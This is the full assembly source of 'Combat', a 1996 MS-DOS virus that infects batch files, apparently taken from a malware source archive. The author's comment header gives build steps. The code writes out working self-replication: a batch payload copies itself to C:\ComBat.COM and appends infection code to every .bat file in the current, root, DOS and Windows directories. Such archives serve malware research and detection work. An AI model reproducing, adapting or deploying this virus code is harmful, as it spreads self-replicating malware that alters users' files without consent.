MalwareSourceCode/MSDOS/C-Index/Virus.MSDOS.Unknown.combat.asm

143 lines
4.6 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;=====( Combat virus by Rajaat )===============================================
;
; Non-resident BAT infector, doesn't use external programs by third party.
;
;==============================================================================
;
; Virus name : Combat
; Author : Rajaat
; Origin : United Kingdom, July 1996
; Compiling : Using TASM
;
; TASM /M COMBAT
; TLINK /T COMBAT
; REN COMBAT.COM COMBAT.BAT
; Targets : BAT files
; Size : Doesn't matter
; Resident : No
; Polymorphic : No
; Encrypted : No
; Stealth : No
; Tunneling : No
; Retrovirus : No
; Antiheuristics: No
; Peculiarities : It infects BAT files parasitically
; Drawbacks : It's a goddamn BAT infector, what do you think?!?
; Behaviour : No really, find out yourself! I was bored and made this,
; do you really think I'd spend time explaining what it DOES?
; It's unknown what this virus might do besides replicate :)
;==============================================================================
;
; Results with antivirus software
;
; TBFILE - Not tested
; TBSCAN - Not tested
; TBMEM - Not tested
; TBCLEAN - Not tested
; SVS - Not tested
; SSC - Not tested
; F-PROT - Not tested
; F-PROT /ANALYSE - Not tested
; F-PROT /ANALYSE /PARANOID - Not tested
; AVP - Not tested
; VSAFE - Not tested
; NEMESIS - Not tested
;
;==============================================================================
.model tiny
.code
.radix 16
signature equ 5240
org 100
main:
db '@REM ',0ff
jmp com_entry
db ' * ComBat *'
db 0dh,0ah
db '@echo off',0dh,0ah
db 'goto ComBat',0dh,0ah
com_entry: mov si,80
cmp byte ptr ds:[si],0
je no_check
cld
find_argument: inc si
lodsb
dec si
cmp al,20
je find_argument
mov dx,si
find_end: lodsb
cmp al,0dh
jne find_end
mov byte ptr ds:[si-1],0
push dx
mov ax,3d02
int 21
jc no_check
xchg ax,bx
lea dx,virus_end
mov ah,3f
mov cx,3
int 21
mov ah,3e
int 21
pop dx
cmp word ptr virus_end,signature
je no_check
mov ax,4301
xor cx,cx
int 21
mov ah,3c
xor cx,cx
lea dx,temp_file
int 21
jc no_check
xchg ax,bx
mov ah,40
lea dx,main
mov cx,file_length
int 21
mov ah,3e
int 21
mov ax,4c00
int 21
db 0,'Rajaat / Genesis',0
no_check: mov ax,4c01
int 21
temp_file db 'ComBat.TMP',0
batch_2 db 0dh,0ah
db ':ComBat',0dh,0ah
db 'if #%_tmp%#==## goto no_call',0dh,0ah
db 'C:\ComBat.COM %1',0dh,0ah
db 'if errorlevel 1 goto done_ComBat',0dh,0ah
db 'type %1 >> ComBat.TMP',0dh,0ah
db 'echo. >> ComBat.TMP',0dh,0ah
db 'echo :done_ComBat >> ComBat.TMP',0dh,0ah
db 'copy ComBat.TMP %1 > nul',0dh,0ah
db 'del ComBat.TMP > nul',0dh,0ah
db 'goto done_ComBat',0dh,0ah
db ':no_call',0dh,0ah
db 'set _tmp=%0',0dh,0ah
db 'if #%_tmp%#==## set _tmp=AUTOEXEC.BAT',0dh,0ah
db 'if not exist %_tmp% set _tmp=%0.BAT',0dh,0ah
db 'if not exist %_tmp% goto path_error',0dh,0ah
db 'copy %_tmp% C:\ComBat.COM > nul',0dh,0ah
db 'for %%f in (*.bat c:\*.bat c:\dos\*.bat c:\windows\*.bat ..\*.bat) do call %_tmp% %%f',0dh,0ah
db 'del C:\ComBat.COM > nul',0dh,0ah
db ':path_error',0dh,0ah
db 'set _tmp=',0dh,0ah
file_length equ $-main
virus_end equ $
db ':done_ComBat',0dh,0ah
end main